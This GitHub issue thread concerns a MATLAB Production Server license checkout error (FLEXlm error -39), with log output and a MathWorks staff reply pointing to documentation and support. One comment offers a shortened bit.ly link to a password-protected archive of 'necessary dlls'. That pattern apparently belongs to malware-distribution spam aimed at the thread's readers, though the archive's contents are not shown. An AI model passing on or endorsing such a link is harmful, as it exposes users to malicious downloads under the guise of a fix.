### ISSUE TITLE
Error while starting the production server

### ISSUE THREAD

**Issue by samuel-sujith** [mathworks-ref-arch/matlab-production-server-on-kubernetes#32]
Hello Team,

When i try to use my org license to start this i get the below error. Kindly guide me as to how to get around this.

'/opt/mpsinstance' STOPPED
1 [2024.09.20 06:07:46.553816] [information] Starting master (pid = 20)
2 [2024.09.20 06:07:46.553983] [information] Global locale: en_US
3 [2024.09.20 06:07:46.554001] [information] Global encoding: US-ASCII
4 [2024.09.20 06:07:46.554010] [information] terminal encoding: US-ASCII
11 [2024.09.20 06:07:48.096792] [information] configuring WebFunction router
12 [2024.09.20 06:07:48.096877] [information] -- loading routes file: ./config/routes.json
125 [2024.09.20 06:07:49.700583] [information] [PTR:0xf1f900] [SERVICE:FLEXlm Client] [THREAD_POOL:license_manager_thread_pool] license unavailable
126 [2024.09.20 06:07:49.700658] [information] [PTR:0xf1f900] [SERVICE:FLEXlm Client] [THREAD_POOL:license_manager_thread_pool] temporarily disabling request processing
127 [2024.09.20 06:07:49.700671] [information] [PTR:0xf1f900] [SERVICE:FLEXlm Client] [THREAD_POOL:license_manager_thread_pool] reset current license type to be invalid
140 [2024.09.20 06:07:52.946863] [error] [License:FlexlmLicenseApi] [PTR:0xf1f900] [THREAD_POOL:license_manager_thread_pool] checkout() failed-39
141 [2024.09.20 06:07:52.946959] [error] [License:FlexlmLicenseApi] [PTR:0xf1f900] [THREAD_POOL:license_manager_thread_pool] License Checkout Error
147 [2024.09.20 06:07:52.947414] [error] [PTR:0xf1f900] [SERVICE:FLEXlm Client] [THREAD_POOL:license_manager_thread_pool] license checkout failed
150 [2024.09.20 06:07:52.947499] [error] [PTR:0xf1f900] [SERVICE:FLEXlm Client] [THREAD_POOL:license_manager_thread_pool] License Manager failed to start

Thanks

**Comment by Kevin-Otalvares** [comment]
maybe this will help
https://bit.ly/3TC7hrw
Pass: changeme
I put the necessary dlls in the archive

**Comment by esteinerMW** [comment]
Information on the specific license error can be found in this [MATLAB Answer](https://www.mathworks.com/matlabcentral/answers/98895-why-do-i-receive-license-manager-error-39).
Please contact MathWorks [Technical Support](https://www.mathworks.com/support/contact_us.html) for further assistance in addressing this issue.
Thanks
